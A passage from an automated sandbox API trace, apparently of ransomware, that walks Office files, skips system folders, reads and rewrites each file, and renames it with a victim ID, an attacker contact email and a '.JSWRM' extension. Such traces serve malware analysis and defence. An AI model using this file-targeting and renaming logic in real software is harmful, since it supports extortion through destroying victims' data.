(lpString1="SCHEME43.CSS", lpString2="documents and settings") returned 1 [0118.032] lstrcmpiW (lpString1="SCHEME43.CSS", lpString2="$RECYCLE.BIN") returned 1 [0118.032] lstrcmpiW (lpString1="SCHEME43.CSS", lpString2="system volume information") returned -1 [0118.032] lstrcmpiW (lpString1="SCHEME43.CSS", lpString2="msocache") returned 1 [0118.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0118.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME43.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME43.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME43.CSS", lpUsedDefaultChar=0x0) returned 12 [0118.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0118.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0118.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME43.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME43.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME43.CSS", lpUsedDefaultChar=0x0) returned 12 [0118.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0118.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0118.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0118.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0118.032] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME43.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme43.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.033] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=124692) returned 1 [0118.033] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e710) returned 0x24c1d0 [0118.033] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1e710, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1e710, lpOverlapped=0x0) returned 1 [0118.044] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.044] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1e710, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1e710, lpOverlapped=0x0) returned 1 [0118.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.045] CloseHandle (hObject=0x314) returned 1 [0118.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0118.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0118.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0118.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0118.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0118.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0118.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0118.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0118.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0118.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0118.045] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME43.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme43.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME43.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme43.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0118.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0118.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0118.046] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xab9b4b8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xab9b4b8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xaccc88d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ecfc, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME44.CSS", cAlternateFileName="")) returned 1 [0118.046] lstrcmpiW (lpString1="SCHEME44.CSS", lpString2=".") returned 1 [0118.046] lstrcmpiW (lpString1="SCHEME44.CSS", lpString2="..") returned 1 [0118.046] lstrcmpiW (lpString1="SCHEME44.CSS", lpString2="...") returned 1 [0118.046] lstrcmpiW (lpString1="SCHEME44.CSS", lpString2="windows") returned -1 [0118.046] lstrcmpiW (lpString1="SCHEME44.CSS", lpString2="recovery") returned 1 [0118.046] lstrcmpiW (lpString1="SCHEME44.CSS", lpString2="perflogs") returned 1 [0118.046] lstrcmpiW (lpString1="SCHEME44.CSS", lpString2="documents and settings") returned 1 [0118.046] lstrcmpiW (lpString1="SCHEME44.CSS", lpString2="$RECYCLE.BIN") returned 1 [0118.046] lstrcmpiW (lpString1="SCHEME44.CSS", lpString2="system volume information") returned -1 [0118.046] lstrcmpiW (lpString1="SCHEME44.CSS", lpString2="msocache") returned 1 [0118.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0118.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME44.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME44.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME44.CSS", lpUsedDefaultChar=0x0) returned 12 [0118.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0118.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0118.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME44.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME44.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME44.CSS", lpUsedDefaultChar=0x0) returned 12 [0118.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0118.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0118.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0118.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0118.047] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME44.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme44.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.047] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=126204) returned 1 [0118.047] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ecf0) returned 0x24c1d0 [0118.047] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1ecf0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1ecf0, lpOverlapped=0x0) returned 1 [0118.058] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.058] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1ecf0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1ecf0, lpOverlapped=0x0) returned 1 [0118.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.058] CloseHandle (hObject=0x314) returned 1 [0118.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0118.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0118.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0118.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0118.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0118.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0118.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0118.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0118.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0118.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0118.059] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME44.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme44.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME44.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme44.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0118.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0118.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0118.060] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xab7525c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xab7525c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xab9b4b8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e6a6, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME45.CSS", cAlternateFileName="")) returned 1 [0118.060] lstrcmpiW (lpString1="SCHEME45.CSS", lpString2=".") returned 1 [0118.060] lstrcmpiW (lpString1="SCHEME45.CSS", lpString2="..") returned 1 [0118.060] lstrcmpiW (lpString1="SCHEME45.CSS", lpString2="...") returned 1 [0118.060] lstrcmpiW (lpString1="SCHEME45.CSS", lpString2="windows") returned -1 [0118.060] lstrcmpiW (lpString1="SCHEME45.CSS", lpString2="recovery") returned 1 [0118.060] lstrcmpiW (lpString1="SCHEME45.CSS", lpString2="perflogs") returned 1 [0118.060] lstrcmpiW (lpString1="SCHEME45.CSS", lpString2="documents and settings") returned 1 [0118.060] lstrcmpiW (lpString1="SCHEME45.CSS", lpString2="$RECYCLE.BIN") returned 1 [0118.060] lstrcmpiW (lpString1="SCHEME45.CSS", lpString2="system volume information") returned -1 [0118.060] lstrcmpiW (lpString1="SCHEME45.CSS", lpString2="msocache") returned 1 [0118.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0118.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME45.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME45.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME45.CSS", lpUsedDefaultChar=0x0) returned 12 [0118.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0118.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0118.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME45.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME45.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME45.CSS", lpUsedDefaultChar=0x0) returned 12 [0118.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0118.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0118.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0118.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0118.060] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME45.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme45.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.061] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=124582) returned 1 [0118.061] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e6a0) returned 0x24c1d0 [0118.061] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1e6a0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1e6a0, lpOverlapped=0x0) returned 1 [0118.097] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.097] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1e6a0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1e6a0, lpOverlapped=0x0) returned 1 [0118.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.097] CloseHandle (hObject=0x314) returned 1 [0118.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0118.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0118.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0118.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0118.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0118.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0118.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0118.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0118.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0118.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0118.098] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME45.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme45.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME45.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme45.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0118.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0118.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0118.099] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad18c6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad18c6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad18c6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1fdb6, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME46.CSS", cAlternateFileName="")) returned 1 [0118.099] lstrcmpiW (lpString1="SCHEME46.CSS", lpString2=".") returned 1 [0118.099] lstrcmpiW (lpString1="SCHEME46.CSS", lpString2="..") returned 1 [0118.099] lstrcmpiW (lpString1="SCHEME46.CSS", lpString2="...") returned 1 [0118.099] lstrcmpiW (lpString1="SCHEME46.CSS", lpString2="windows") returned -1 [0118.099] lstrcmpiW (lpString1="SCHEME46.CSS", lpString2="recovery") returned 1 [0118.099] lstrcmpiW (lpString1="SCHEME46.CSS", lpString2="perflogs") returned 1 [0118.099] lstrcmpiW (lpString1="SCHEME46.CSS", lpString2="documents and settings") returned 1 [0118.099] lstrcmpiW (lpString1="SCHEME46.CSS", lpString2="$RECYCLE.BIN") returned 1 [0118.099] lstrcmpiW (lpString1="SCHEME46.CSS", lpString2="system volume information") returned -1 [0118.099] lstrcmpiW (lpString1="SCHEME46.CSS", lpString2="msocache") returned 1 [0118.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0118.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME46.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME46.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME46.CSS", lpUsedDefaultChar=0x0) returned 12 [0118.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0118.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0118.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME46.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME46.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME46.CSS", lpUsedDefaultChar=0x0) returned 12 [0118.099] HeapFree 